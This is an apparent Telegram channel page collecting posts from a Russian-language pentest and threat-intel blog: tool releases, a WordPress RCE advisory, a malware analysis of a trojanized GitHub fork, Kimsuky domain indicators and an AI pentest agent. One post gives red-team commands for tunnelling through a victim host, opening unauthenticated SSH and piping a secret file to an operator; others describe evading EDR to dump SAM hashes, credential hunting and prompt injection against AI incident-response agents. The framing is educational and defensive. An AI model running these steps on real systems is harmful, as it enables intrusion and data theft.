s0ld13r ch.
رفتن به کانال در Telegram
Blog about Pentest, TI/TH, OPSEC & other security stuff Questions: @s0ld133r Blog: https://s0ld13r.kz TIP: https://threatintel.kz LoLAI: https://lolai-project.github.io/ For educational purposes only 🧠
نمایش بیشتر2 605
مشترکین
+424 ساعت
+167 روز
+6730 روز
در حال بارگیری داده...
کانالهای مشابه
هیچ دادهای
مشکلی وجود دارد؟ لطفاً صفحه را تازه کنید یا با مدیر پشتیبانی ما تماس بگیرید.
ابر برچسبها
اشارات ورودی و خروجی
---
---
---
---
---
---
جذب مشترکین
سپتامبر '26سپتامبر '26
سپتامبر '26
+83
در 5 کانالها
اوت '26
+77
در 2 کانالها
Get PRO
ژوئیه '26
+100
در 3 کانالها
Get PRO
ژوئن '26
+64
در 1 کانالها
Get PRO
مه '26
+65
در 1 کانالها
Get PRO
آوریل '26
+167
در 4 کانالها
Get PRO
مارس '26
+167
در 6 کانالها
Get PRO
فوریه '26
+220
در 3 کانالها
Get PRO
ژانویه '26
+156
در 7 کانالها
Get PRO
دسامبر '25
+80
در 2 کانالها
Get PRO
نوامبر '25
+105
در 5 کانالها
Get PRO
اکتبر '25
+148
در 4 کانالها
Get PRO
سپتامبر '25
+222
در 5 کانالها
Get PRO
اوت '25
+131
در 2 کانالها
Get PRO
ژوئیه '25
+116
در 3 کانالها
Get PRO
ژوئن '25
+81
در 2 کانالها
Get PRO
مه '25
+149
در 4 کانالها
Get PRO
آوریل '25
+774
در 7 کانالها
Get PRO
مارس '250
در 9 کانالها
Get PRO
فوریه '25
+48
در 7 کانالها
| تاریخ | رشد مشترکین | اشارات | کانالها | |
| 28 سپتامبر | +1 | |||
| 27 سپتامبر | +4 | |||
| 26 سپتامبر | +2 | |||
| 25 سپتامبر | +9 | |||
| 24 سپتامبر | 0 | |||
| 23 سپتامبر | +5 | |||
| 22 سپتامبر | +1 | |||
| 21 سپتامبر | 0 | |||
| 20 سپتامبر | 0 | |||
| 19 سپتامبر | +4 | |||
| 18 سپتامبر | +2 | |||
| 17 سپتامبر | +2 | |||
| 16 سپتامبر | +1 | |||
| 15 سپتامبر | +2 | |||
| 14 سپتامبر | +1 | |||
| 13 سپتامبر | 0 | |||
| 12 سپتامبر | 0 | |||
| 11 سپتامبر | +2 | |||
| 10 سپتامبر | +2 | |||
| 09 سپتامبر | 0 | |||
| 08 سپتامبر | 0 | |||
| 07 سپتامبر | +2 | |||
| 06 سپتامبر | +1 | |||
| 05 سپتامبر | +1 | |||
| 04 سپتامبر | +10 | |||
| 03 سپتامبر | +10 | |||
| 02 سپتامبر | +4 | |||
| 01 سپتامبر | +17 |
پستهای کانال
| 2 | Screamer - Fast Network Discovery
Частенько во время пентестов внутрянки приходится сталкиваться с ситуациями когда надо сделать пробу "живых" подсетей при этом не нагружая канал тяжелыми сканами 😎
Мой хороший друг Ifrit сделал классную утилиту чтобы решить эту бытовую проблему 😺
Установка
sudo pipx install --global git+https://github.com/ifritnoises/screamer
AUR (Arch)
yay -S screamer
BlackArch
sudo pacman -S screamer
💻 github: https://github.com/ifritnoises/screamer
🔗 https://ifritnoises.org/articles/pattern-screamer/
🧢 s0ld13r | 928 |
| 3 | بدون متن... | 1 171 |
| 4 | Недавно попалась на глаза интересная публикация от Elastic, и я поймал себя на мысли, что тема Observability vs Security до сих пор остаётся одной из самых недооценённых слепых зон в архитектуре многих SOC и ИТ-блоков.
Захотелось поделиться своим мнением на этот счёт.
Если очистить термины от маркетинга, обе системы смотрят на одну и ту же инфраструктуру, но из разных сторон:
Observability (ИТ-наблюдаемость) - это врач скорой помощи. Ей важен пульс и давление системы: чтобы ничего не «падало», CPU не грелся, а сервисы откликались быстро.
Задаётся вопросом: «Почему всё тормозит?» - и стремится решить проблему как можно быстрее.
Security Monitoring (Мониторинг ИБ) - это детектив. Ему не так важна производительность, ему важен умысел.
Задаётся вопросом: «Кто это сделал и куда утекают данные?», то есть разбирает ситуацию с точки зрения причинно-следственной связи.
В чём главный конфликт и где кроются риски?
На практике эти два направления почти всегда разведены по разным платформам и командам. В итоге мы получаем две классические проблемы:
1. Экономическая: компании дважды платят за обработку и хранение одних и тех же данных (Syslog, NetFlow, DNS) в двух разных «корзинах».
2. Операционная (самая опасная): атаки сегодня идеально маскируются под обычный инфраструктурный шум.
Классический кейс из статьи Elastic: ночью у сервера взлетает CPU до 97%. Дежурный инженер IT/DevOps заходит в консоль мониторинга, видит аномальную нагрузку, перезагружает хост и со спокойной душой закрывает тикет со статусом «Resolved».
А что на самом деле? За 6 часов до этого туда задеплоили майнер, замаскированный под системный поток ядра. В итоге ИТ отчиталось об устранении сбоя, Security вообще ничего не узнало, а хакеры спокойно продолжают крутить свои процессы.
Резюмируя, можно сказать следующее:
Observability отвечает на вопрос «Система жива?», а Security - «Систему не взломали?». Пока они живут в разных системах, мы видим только половину картины. Общий контекст - это не просто экономия на хранении логов, это единственная возможность оперативно выявить и заблокировать атаку до того, как она превратится в инцидент.
Ссылка на ту самую статью Elastic: elastic.co/blog | 1 150 |
| 5 | بدون متن... | 4 122 |
| 6 | TailCat Red Team use case 😎
Несколько дней назад ребята из TailScale выпустили свой инструмент tailcat, как можно понять из названия, это аналог netcat но работающий из коробки через сеть TailScale 🤩
Первой моей мыслью стало что инструментом начнут активно пользоваться атакующие и решил расписать разные примеры применения нового "условно легитимного" софта 😃
🔢 SOCKS5 Reverse Proxy
Можно использовать машину жертвы как exit-node и через неё получать доступ к внутренней сети. На машине жертвы запускаем следующую команду:
tailcat --serve=exit-node
По умолчанию tailcat socks поднимает SOCKS5 на случайном порту и передаёт адрес и порт через переменную окружения. Чтобы не возиться с этим каждый раз, я написал небольшой wrapper под названием tcsocks, который поднимает локальный SOCKS5 на 1080 (порт можно поменять). На машине оператора запускаем:
tcsocks -q <token>
А дальше как обычно пользуемся proxychains:
proxychains -f proxy.conf -q nxc rdp 192.168.0.0/24
🔢 SSH доступ без авторизации
Tailcat также позволяет в user mode слушать SSH от пользователя, без необходимости вводить пароль, это особенно удобно если был нестабильный шелл и нужно было использовать альтернативный канал. Сперва слушаем No Auth SSH на машине жертвы:
tailcat --serve=no-auth-ssh
Далее подключаемся по токену с машины оператора:
tailcat ssh <token>
🔢 Эксфильтрация данных через pipe
Ну и классика - эксфильтрация файлов через pipe на машине жертвы запускаем:
cat secret.txt | tailcat <token>
На машине оператора запускаем:
tailcat > secret.txt
Из плюсов вижу то, что инструмент условно легитимный и работает из коробки, с открытым исходным кодом который можно кастомизировать под свои нужды 😎
💻 tcsocks: https://gist.github.com/s0ld13rr/18e2765da1831af0a656e7bb0a819e73
💻 tailcat: https://github.com/tailscale/tailcat
🧢 s0ld13r | 2 529 |
| 7 | Всем привет! Решил создать личный канал в Telegram!
Добро пожаловать!
Идейный вдохновитель и человек, который чаще всех спрашивал, когда я уже его создам — Аскар @rockyou. Аскар, держи! 😉 | 1 763 |
| 8 | Канал моего хорошего друга, рекомендую подписаться 😃 | 1 668 |
| 9 | В свете последних новостей про eGov, актуалочка 🤣😃
🧢 s0ld13r | 3 254 |
| 10 | Дампим SAM/SYSTEM через 7-Zip
Знакомая ситуация: вы на машине юзера, нужно достать хеши, но reg save или copy блокируются EDR, файлы заблокированы самой Windows, а антивирус палит известные утилиты.
Но на рабочих станциях часто установлен 7-Zip! И у него есть крутая недокументированная фича - прямое чтение диска (raw disk access).
А можно использовать и для DFIR извлекать MFT и т.д.
Чем проще и банальнее тем лучше : ) | 1 783 |
| 11 | PentestCode v0.2.4 is out 🤩
Выкатил новую версию PentestCode с несколькими улучшениями, в основном правил мультиагентную архитектуру и жесткость границ между их работой 😺
😱 Что изменилось:
• Добавил полноценный Artifact Store. Теперь PoC, сгенерированные одним саб-агентом, регистрируются в state и переиспользуются другими вместо повторной генерации
• Полностью переделал работу с engagement state. Саб-агенты получают только релевантный контекст, что заметно сократило расход токенов
• Координатор теперь реально координирует, а не пытается сам делать всю работу. Добавил рейлы, watchdog’и, лимиты и защиту от бесконечных циклов
• Усилил самокритику. Недостаточно сказать «есть root» - любой успешный результат должен подтверждаться артефактом, иначе это только suspected
• Подточил reconnaissance skills и порядок их загрузки
👩💻 Обновление:
pentestcode upgrade
P.S Еще есть куда расти дальше поэтому обратная связь, баги, кейсы успешных/провальных прогонов приветствуются 😉
🧢 s0ld13r | 1 995 |
| 12 | Supply-chain атака: EtherHiding C2 во вредоносном форке PentestCode 🕺
Пока просматривал форки своего проекта PentestCode, наткнулся на довольно странные коммиты в одном из них.
⚠️ Сразу отмечу: оригинальный репозиторий PentestCode не был скомпрометирован. Вредоносный код находился исключительно в стороннем форке
Решил разобраться, что именно туда добавили. В итоге обычная проверка форка превратилась в полноценный malware research с обширной кампанией. После нескольких этапов деобфускации выяснилось, что это не простой downloader и не очередной стилер, а многоступенчатый JavaScript-бэкдор с удалённым исполнением кода (RCE), использующий технику EtherHiding 😃
🔍 Что удалось установить:
• 4 уровня обфускации и самораспаковки;
• получение C2 через блокчейн Ethereum без единого захардкоженного IP;
• поиск C2 по транзакциям атакующего через публичные Ethereum RPC;
• декодирование IP:Port прямо из поля to;
• загрузка stage-2 → stage-3;
• несколько способов исполнения payload (spawn, eval и резервный запуск);
• скрытый запуск процессов (windowsHide, stdio: ignore);
• переход из WSL2 на Windows-хост через node.exe
Самое интересное - C2 вообще не зашит в код. Вместо этого используется Ethereum как dead-drop: новая транзакция публикует новый адрес C2, и заражённые машины автоматически начинают обращаться уже к нему. Такой подход серьёзно усложняет блокировку инфраструктур 🦍
Но дальше стало ещё интереснее - вредоносный форк принадлежит GitHub-аккаунту KumaloWilson. На аккаунте почти 200 публичных репозиториев, большинство последних - форки инструментов для специалистов по ИБ и AI-разработчиков 🙀
Среди них:
• PentestCode
• KaliGPT
• Kittysploit
• Meterless
• Nebula
• cybersentinel-ai
• AhMyth+
• и другие.
Сложилось впечатление, что злоумышленники целенаправленно троянизируют проекты, которые с высокой вероятностью будут запускать пентестеры, ресерчеры и разработчики - именно там обычно находятся SSH-ключи, GitHub Token, .env, облачные креды и криптокошельки 😎
При этом нет доказательств, что владелец аккаунта KumaloWilson является автором кампании. Не исключено, что сам аккаунт был скомпрометирован и использовался для распространения вредоносных форков 💻
Полный список IoC в комментариях, проверяйте не только то, что запускаете, но и откуда вы это клонируете 😉
🧢 s0ld13r | 1 839 |
| 13 | 🚨 WP2Shell - критический RCE в WordPress Core
Исследователи опубликовали детали уязвимости WP2Shell, которая позволяет неаутентифицированному атакующему добиться Remote Code Execution (RCE) на уязвимых версиях WordPress 👩💻
📌 Затронутые версии:
• WordPress ниже 6.8.5 - не уязвимы
• WordPress 6.9.0 – 6.9.4 - уязвимы
• WordPress 7.0.0 – 7.0.1 - уязвимы
👀 Что делать?
• Необходимо как можно скорее обновить версию CMS WordPress до версии 7.0.2 (или 6.9.5 если вы на ветке 6.9)
• Если обновиться не получиться, то можно временно заблокировать доступ к /wp-json/batch/v1 и ?rest_route=/batch/v1 на уровне WAF
⚠️ Учитывайте что могут появиться проблемы в работе сервиса и вариант с обновлением предпочтительнее
🔗 Post:
https://slcyber.io/research-center/wp2shell-pre-authentication-rce-in-wordpress-core/
🧢 s0ld13r | 1 650 |
| 14 | 🛠 Всем привет.
Я тут допилил CLI-движок для LOLCreds на Go. Называется это безобразие CredsHound.
Если коротко, это такая утилита для поиска учетных данных, ключей на хосте, которая работает по концепции Nuclei.
Из коробки она ищет:
- Пароли и API-ключи, забытые в истории терминалов (.bash_history, .zsh_history, ConsoleHost_history.txt).
- Приватные ключи SSH, конфигурации Kubernetes и токены Docker Registry.
- Артефакты Windows: пароли из файлов автоматической установки (Unattended XML), конфиги RDCMan и групповые политики с зашифрованными cpassword.
- Локальные файлы конфигурации БД вроде .pgpass или .my.cnf.
🐶 Ну и интеграция с собакой тоже есть.
Потому что просто выплевывать цветной текст в консоль скучно.
📖 Как запустить:
# установка
go install github.com/haxxm0nkey/credshound/cmd/credshound@latest
# запуск
credshound -ut
credshound .
🔗 Где исходники, Билли?
Движок: https://github.com/haxxm0nkey/credshound
Хорошей пятницы вам, держитесь там! | 1 092 |
| 15 | LegacyHive: Just another Windows LPE from NightmareEclipse
The PoC requires another standard user credentials and a third username (which can be an administrator account), if the PoC is successful, it will end up mounting the target user hive in current user classes root.
💻 LegacyHive: https://git.projectnightcrawler.dev/NightmareEclipse/LegacyHive
🧢 s0ld13r | 1 420 |
| 16 | 🅰️🅰️🅰️🅰️🅰️🅰️🅰️🅰️🅰️🅰️🅰️ 🅰️🔢❎🔢❎🔢
Выкатил ряд фиксов на PentestCode в релизе 0.2.1 (альфа). В этот раз основной фокус был не на новых фичах, а на том, чтобы сделать агента более стабильным и приблизить его поведение к работе реального пентестера (ну или не очень) 😎
• Улучшена оркестрация и управление субагентами
• Добавлена обязательная just-in-time загрузка скиллов
• Доработан TUI: теперь проще отслеживать активных субагентов
• Исправлен механизм обновлений - теперь достаточно выполнить pentestcode upgrade, чтобы обновить и самого агента, и встроенные скиллы (применимо только с v0.2.1 и последующих релизах)
Ну и, конечно, некоторые фиксы и полировки по мелочи. Я подготовил короткое демо как это примерно выглядит на данном этапе 😺
В последующих релизах постараюсь исправить и другие недочеты, чтобы пользоваться им было еще приятнее, stay tuned 😎
P.S А я напомнию что у меня есть аккаунт в X - буду рад видеть вас там в качестве подписчиков 😉 https://x.com/s0ld133rr?s=11
🧢 s0ld13r | 1 698 |
| 17 | И таааааак сойдет😅
Давно ничего не постил. За это время успел увидеть как все резко стали экспертами по мультиагентным системам, MCP, A2A и еще двадцати новым аббревиатурам которые появляются быстрее чем новые модели у OpenAI ⭕️
Но как бы то ни было, жизнь ироничная штука. В какой-то момент я тоже решил посмотреть, что вообще происходит в мире AI для Offensive Security. Перетестил разные инструменты, поковырял open-source проекты и понял, что почти везде мне чего-то не хватает: где-то архитектуры, где-то удобного workflow, где-то агент просто забывает, что было пять сообщений назад 🥱
Так появился PentestCode - форк OpenCode, заточенный под пентест. Вместо того чтобы тратить недели на TUI, авторизацию и поддержку десятков LLM-провайдеров, я решил сосредоточиться на архитектуре и воркфлоу агента 😎
Пока успел реализовать engagements со своим состоянием, общий контекст для всех субагентов, Task Graph для планирования, автоматический импорт результатов популярных инструментов, построение Attack Path и память между агентами. Сейчас проекту очень нужно много тестов, предложений и замечаний поэтому я буду очень признателен за обратную связь в лс или в issues на github 👋
👩💻 Установка:
curl -fsSL https://raw.githubusercontent.com/s0ld13rr/pentestcode/main/install.sh | bash
👀Использование:
pentestcode auth login
pentestcode # launch TUI
pentestcode -s <session-id>
💻 PentestCode: https://github.com/s0ld13rr/pentestcode
Буду рад если поставите звезду на гитхабе и поделитесь с друзьями/коллегами 😉
P.S Проект еще очень молодой поэтому могут быть недочеты за фиксом можно в лс
🧢 s0ld13r | 3 644 |
| 18 | Обнаружены подозрительные домены в зоне home[.]kg 🇰🇬
Домены
- auth.home[.]kg 🇰🇬
- vscode.auth.home[.]kg 🇰🇬
Оба домена присутствуют в Maltrail (apt_kimsuky.txt) и связаны с инфраструктурой, которую OSINT-источники относят к Kimsuky / APT43 / Emerald Sleet.
Текущие резолвы
auth.home[.]kg 🇰🇬
• IP-адрес: 80.68.237.36
• Локация / Провайдер: Польша 🇵🇱
vscode.auth.home[.]kg 🇰🇬
• IP-адрес: 153.75.247.209
• Локация / Провайдер: США 🇺🇸, Interserver (VPS)
Цель атаки
Это атака на разработчиков.
Домен vscode.auth.home[.]kg создан для имитации легитимного OAuth redirect URI Visual Studio Code. Такие домены используются для кражи токенов аутентификации у разработчиков, DevOps-инженеров и исследователей.
Важное замечание
home[.]kg 🇰🇬 — это публичная FreeDNS-зона на afraid.org. Любой может создавать поддомены. Наличие .kg не означает, что целью является Кыргызстан.
О группе Kimsuky
Kimsuky (APT43 / Emerald Sleet) — северокорейская кибершпионская группа, активная с 2012 года. Для неё характерны социальная инженерия, поддельные страницы входа и кража учётных данных у технических специалистов. | 1 217 |
| 19 | Сделал скромный вклад в IPAHound 🐕
Столкнулся с тем, что оригинальный pyproject.toml конфликтовал с новыми версиями Python 👩💻, из-за чего установка могла ломаться. Подготовил фикс и отправил Merge Request (уже принят), теперь установка должна проходить заметно проще 💃
👩💻 Установка:
curl -LsSf https://astral.sh/uv/install.sh | sh
uv tool install git+https://github.com/IPAHound/IPAHound
😎 Использование:
ipahound -s dc.soldier.local -u user.name -p 'p@ssw0rd' -o dump.json
💻 MR: https://github.com/IPAHound/IPAHound/pull/3
🧢 s0ld13r | 2 500 |
| 20 | Same Tool, Two Hats: AI Velociraptor for Attack and Defense
Всё чаще появляются отчёты об LLM-operated атаках: человек задаёт цель, а LLM помогает вести операцию - выбирает следующий шаг, интерпретирует вывод инструментов и принимает тактические решения.
Этот POC - попытка показать, как такая модель выглядит на практике с реальным DFIR-инструментом.
За основу взят mgreen27/mcp-velociraptor - MCP-обёртка над Velociraptor API: https://github.com/mgreen27/mcp-velociraptor
Изначальная идея проекта - дать DFIR-аналитику возможность работать с Velociraptor через Claude. Я посмотрел на ту же связку с другой стороны: если LLM может помогать защитнику исследовать endpoint, те же вещи могут работать и в adversary emulation. На эту мысль также натолкнул пост:
https://t.me/s0ld13r_ch/82
Velociraptor здесь интересен как dual-use инструмент: легитимный агент, подписанный бинарь, TLS-трафик, централизованный сервер и мощный язык артефактов. В defensive-сценарии это ускоряет IR. В offensive-модели тот же подход может превратиться в управляемый канал для reconnaissance, command execution и controlled file collection.
Я добавил кастомных оберток поверх оригинального MCP проекта:
- run_shell, run_powershell, run_vql_raw - выполнение команд и client-side VQL через Velociraptor.
- collect_arbitrary_file, recursive_collect - точечный сбор файлов и scoped recursive collection из заданных директорий.
- download_file, upload_file - работа с собранными файлами и controlled transfer с SHA256-verification.
Разница принципиальная: оригинальный bridge помогает LLM видеть endpoint через DFIR-артефакты. Добавленные обертки позволяют LLM инициировать действия через Velociraptor API.
В моей лабе Defensive сторона та же: IR-аналитик подключает свой Velociraptor-сервер, деплоит агент на исследуемую машину и через Claude Desktop/Claude Code проводит triage. Процессы, сетевые соединения, сервисы, scheduled tasks, Sysmon Event ID 1/3, Event ID 7045, Amcache, Shimcache и файловые артефакты читаются через один MCP-интерфейс.
Главный challenge - Prompt Injection в AI-assisted IR.
Если атакующий оставляет payload в логах, файлах, command line или staged notes, DFIR-агент может прочитать attacker-controlled content через LLM. В этот момент артефакт просто руинит исследование для IR команды...
То есть в AI-assisted IR нужно понимать как работает аналитический контур: как LLM читает артефакты, где отделяются данные от инструкций, какие действия требуют подтверждений и как логируются вызовы инструментов.
Мои Custom MCP тулы:
https://github.com/rarh1k/mcp-ai-velo-dfir
References:
Solar 4RAYS - https://rt-solar.ru/solar-4rays/blog/4559/
Sophos - https://news.sophos.com/en-us/2025/08/26/velociraptor-incident-response-tool-abused-for-remote-access/
Rapid7 - https://www.rapid7.com/blog/post/pt-identifying-and-mitigating-potential-velociraptor-abuse/
Cisco Talos - https://blog.talosintelligence.com/velociraptor-leveraged-in-ransomware-attacks/
🦔 THF
#Velociraptor #DFIR #ThreatHunting #IncidentResponse #MCP #ClaudeCode #LLM #AIForCybersecurity #AIIR #PromptInjection #RedTeam #AdversaryEmulation #DualUse #CyberSecurity #DetectionEngineering #DigitalForensics #SOC #APT #IR #THF | 732 |
